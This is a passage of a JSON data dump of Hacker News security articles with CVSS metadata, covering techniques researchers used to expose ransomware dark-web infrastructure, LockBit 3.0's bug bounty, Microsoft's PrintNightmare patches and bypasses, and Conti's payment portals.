[DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data 
to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware 
servers.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its 
software.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-wbLrBJlJCfE/YOUa-690-KI/AAAAAAAADG0/6tT84mGPz6gQ_5vYBxhkEE_spk0LW4WpwCLcBGAsYHQ/s0/windows-patch-update.jpg>)\n\nMicrosoft has shipped an [emergency out-of-band security update](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#1646>) to address a critical zero-day vulnerability \u2014 
known as \"PrintNightmare\" \u2014 that affects the Windows Print Spooler service and can permit remote threat actors to run arbitrary code and take over vulnerable systems.\n\nTracked as [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8), the remote code execution flaw impacts all supported editions of Windows. Last week, the company warned it had detected active exploitation attempts targeting the vulnerability.\n\n\"The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system,\" the CERT Coordination Center said of the issue.\n\nIt's worth noting that PrintNightmare includes both remote code execution and a [local privilege escalation](<https://github.com/calebstewart/CVE-2021-1675>) vector that can be abused in attacks to run commands with SYSTEM privileges on targeted Windows machines.\n\n[](<https://thehackernews.com/images/-NzUbsCmtpLU/YOUekekqtnI/AAAAAAAADG8/HwnD7Xq3_iYftG9BrRvS1tJxIBOomRzXgCLcBGAsYHQ/s0/lpe.jpg>)\n\n\"The Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" CERT/CC vulnerability analyst Will Dormann [said](<https://www.kb.cert.org/vuls/id/383432>).\n\nThis effectively means that the incomplete fix could still be used by a local adversary to gain SYSTEM privileges. 
As workarounds, Microsoft recommends stopping and disabling the Print Spooler service or turning off inbound remote printing through Group Policy to block remote attacks.\n\nGiven the criticality of the flaw, the Windows maker has issued patches for:\n\n * Windows Server 2019\n * Windows Server 2012 R2\n * Windows Server 2008\n * Windows 8.1\n * Windows RT 8.1, and\n * Windows 10 (versions 21H1, 20H2, 2004, 1909, 1809, 1803, and 1507)\n\nMicrosoft has even taken the unusual step of issuing the fix for Windows 7, which officially reached the end of support as of January 2020.\n\nThe [update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), however, does not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016, for which the Redmond-based company stated patches will be released in the forthcoming days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-07T03:11:00", "type": "thn", "title": "Microsoft Issues Emergency Patch for Critical Windows PrintNightmare Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T03:38:13", "id": "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "href": "https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-4tveTym6-fk/YOZ_5ZwEbHI/AAAAAAAADHs/xXSCpfsipXYpe6tJM2SGaTIDUE9dVGoGwCLcBGAsYHQ/s0/PrintNightmare-Vulnerability-Patch.jpg>)\n\nEven as Microsoft [expanded patches](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center>) for the so-called [PrintNightmare vulnerability](<https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html>) for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the fix for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to run arbitrary code on infected systems.\n\nOn Tuesday, the Windows maker issued an [emergency out-of-band update](<https://thehackernews.com/2021/07/microsoft-issues-emergency-patch-for.html>) to address [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) (CVSS score: 8.8) after the flaw was accidentally disclosed by researchers from Hong Kong-based cybersecurity firm Sangfor late last month, at which point it emerged that the issue was different from another bug \u2014 tracked as [CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \u2014 that was patched by Microsoft on June 8.\n\n\"Several days ago, two security vulnerabilities 
were found in Microsoft Windows' existing printing mechanism,\" Yaniv Balmas, head of cyber research at Check Point, told The Hacker News. \"These vulnerabilities enable a malicious attacker to gain full control on all windows environments that enable printing.\"\n\n\"These are mostly working stations but, at times, this relates to entire servers that are an integral part of very popular organizational networks. Microsoft classified these vulnerabilities as critical, but when they were published they were able to fix only one of them, leaving the door open for explorations of the second vulnerability,\" Balmas added.\n\nPrintNightmare stems from bugs in the Windows [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) service, which manages the printing process inside local networks. The main concern with the threat is that non-administrator users had the ability to load their own printer drivers. This has now been rectified.\n\n\"After installing this [update] and later Windows updates, users who are not administrators can only install signed print drivers to a print server,\" Microsoft [said](<https://support.microsoft.com/en-us/topic/july-7-2021-kb5004948-os-build-14393-4470-out-of-band-fb676642-a3fe-4304-a79c-9d651d2f6550>), detailing the improvements made to mitigate the risks associated with the flaw. 
\"Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\"\n\nPost the update's release, CERT/CC vulnerability analyst Will Dormann cautioned that the patch \"only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant,\" thereby allowing attackers to abuse the latter to gain SYSTEM privileges on vulnerable systems.\n\nNow, further testing of the update has revealed that exploits targeting the flaw could [bypass](<https://twitter.com/gentilkiwi/status/1412771368534528001>) the [remediations](<https://twitter.com/wdormann/status/1412813044279910416>) entirely to gain both local privilege escalation and remote code execution. To achieve this, however, a [Windows policy](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer>) called '[Point and Print Restrictions](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/group-policy/point-print-restrictions-policies-ignored>)' must be enabled (Computer Configuration\\Policies\\Administrative Templates\\Printers: Point and Print Restrictions), using which malicious printer drivers could be potentially installed.\n\n\"Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the Point and Print NoWarningNoElevationOnInstall is set to 1,\" Dormann [said](<https://www.kb.cert.org/vuls/id/383432>) Wednesday. 
Microsoft, for its part, [explains in its advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) that \"Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible.\"\n\nWhile Microsoft has recommended the nuclear option of stopping and disabling the Print Spooler service, an [alternative workaround](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) is to enable security prompts for Point and Print, and limit printer driver installation privileges to administrators alone by configuring the \"RestrictDriverInstallationToAdministrators\" registry value to prevent regular users from installing printer drivers on a print server.\n\n**UPDATE:** In response to CERT/CC's report, Microsoft [said](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) on Thursday:\n\n\"Our investigation has shown that the OOB [out-of-band] security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare. All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-08T04:35:00", "type": "thn", "title": "Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T09:52:49", "id": "THN:CAFA6C5C5A34365636215CFD7679FD50", "href": "https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:23", "description": "[](<https://thehackernews.com/images/-RJ_0BYkTxHY/YN7HyUD-_KI/AAAAAAAA4SA/dbXcZli9DPwTnJvla5sgZ3hDzIqO8zLRgCLcBGAsYHQ/s0/windows-print-spooler-vulnerability.jpg>)\n\nMicrosoft on Thursday officially confirmed that the \"**PrintNightmare**\" remote code execution (RCE) vulnerability affecting Windows Print Spooler is different from the 
issue the company addressed as part of its Patch Tuesday update released earlier this month, while warning that it has detected exploitation attempts targeting the flaw.\n\nThe company is tracking the security weakness under the identifier [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), and has assigned it a severity rating of 8.8 on the CVSS scoring system. All versions of Windows contain the vulnerable code and are susceptible to exploitation.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" Microsoft said in its advisory. \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n\"An attack must involve an authenticated user calling RpcAddPrinterDriverEx(),\" the Redmond-based firm added. 
When reached by The Hacker News, the company said it had nothing to share beyond the advisory.\n\nThe acknowledgment comes after researchers from Hong Kong-based cybersecurity company Sangfor [published](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) a technical deep-dive of a Print Spooler RCE flaw to GitHub, along with a fully working PoC code, before it was taken down just hours after it went up.\n\n[](<https://thehackernews.com/images/-Zl5E2TyZRFQ/YN7Ej6s8x8I/AAAAAAAA4R4/FEYZ4JpYdakscU9e8eXMl9VEI0Hl1P_SwCLcBGAsYHQ/s0/ms.jpg>)\n\nThe disclosures also set off speculation and debate about whether the June patch does or does not protect against the RCE vulnerability, with the CERT Coordination Center [noting](<https://kb.cert.org/vuls/id/383432>) that \"while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.\"\n\nCVE-2021-1675, originally classified as an elevation of privilege vulnerability and later revised to RCE, was remediated by Microsoft on June 8, 2021.\n\nThe company, in its advisory, noted that PrintNightmare is distinct from CVE-2021-1675 for reasons that the latter resolves a separate vulnerability in RpcAddPrinterDriverEx() and that the attack vector is different.\n\nAs workarounds, Microsoft is recommending users to disable the Print Spooler service or turn off inbound remote printing through Group Policy. To reduce the attack surface and as an alternative to completely disabling printing, the company is also advising to check membership and nested group membership, and reduce membership as much as possible, or completely empty the groups where possible.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T05:36:00", "type": "thn", "title": "Microsoft Warns of Critical \"PrintNightmare\" Flaw Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-03T07:11:54", "id": "THN:9CE630030E0F3E3041E633E498244C8D", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg>)\n\nMicrosoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming 
security update.\n\nTracked as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug.\n\n\"An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,\" the Windows maker said in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nHowever, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device.\n\n[](<https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg>)\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability.\n\nThe development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks.\n\nDubbed PrintNightmare ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems.\n\nHowever, it later emerged that the 
out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are \"working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T04:40:00", "type": "thn", "title": "Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-17T11:53:08", "id": "THN:CF5E93184467C7B8F56A517CE724ABCF", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEguJG5dD1Vh67fJlg0O-HXucpsF2Y-eVW6kua8F3Er_7OwG5WZpZAqvZHKbXJboPvuTyfrTXpc260OZ87-4ehJm-_qY8JOnLJxhWok-es74ZTW3O7ua3WuueglfYtH7632jDmh5DfPftDD998FED2xruJFMtTPwe_eI7umOKXrdazu4WRTC-OnHg7ND>)\n\nThe clearnet and dark web payment portals operated by the [Conti](<https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html>) ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public.\n\nAccording to [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1461450607311605766>), \"while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down.\"\n\nIt's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT [offered](<https://www.prodaft.com/resource/detail/conti-ransomware-group-depth-analysis>) an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims.\n\nThe result? 
Three members of the Conti team have been identified so far, each playing the roles of admin (\"Tokyo\"), assistant (\"it_work_support@xmpp[.]jp\"), and recruiter (\"IT_Work\") to attract new affiliates into their network.\n\nWhile ransomware attacks work by encrypting the victims' sensitive information and rendering it inaccessible, threat actors have increasingly latched on to a two-pronged strategy called double extortion to demand a ransom payment for decrypting the data and threaten to publicly publish the stolen information if the payment is not received within a specific deadline.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX>)\n\n\"Conti customers \u2013 affiliate threat actors \u2013 use [a digital] management panel to create new ransomware samples, manage their victims, and collect data on their attacks,\" noted the researchers, detailing the syndicate's attack kill chain leveraging PrintNightmare ([CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>), [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), and [CVE-2021-36958](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>)) and FortiGate ([CVE-2018-13374](<https://nvd.nist.gov/vuln/detail/CVE-2018-13374>) and [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)) vulnerabilities to compromise unpatched systems.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg>)\n\nEmerging on the cybercrime landscape in October 2019, Conti is believed to be the work of a Russia-based threat 
group called [Wizard Spider](<https://malpedia.caad.fkie.fraunhofer.de/actor/wizard_spider>), which is also the operator of the infamous [TrickBot](<https://thehackernews.com/2021/11/trickbot-operators-partner-with-shatak.html>) banking malware. Since then, at least 567 different companies have had their business-critical data exposed on the victim shaming site, with the ransomware cartel receiving over 500 bitcoin ($25.5 million) in payments since July 2021.\n\nWhat's more, an analysis of ransomware samples and the bitcoin wallet addresses utilized for receiving the payments has revealed a connection between Conti and Ryuk, with both families heavily banking on TrickBot, Emotet, and BazarLoader for actually [delivering the file-encrypting payloads](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) onto victim's networks via email phishing and other social engineering schemes.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5>)\n\nPRODAFT said it was also able to gain access to the group's recovery service and an admin management panel hosted as a Tor hidden service on an Onion domain, revealing extensive details of a clearnet website called \"contirecovery[.]ws\" that contains instructions for purchasing decryption keys from the affiliates. 
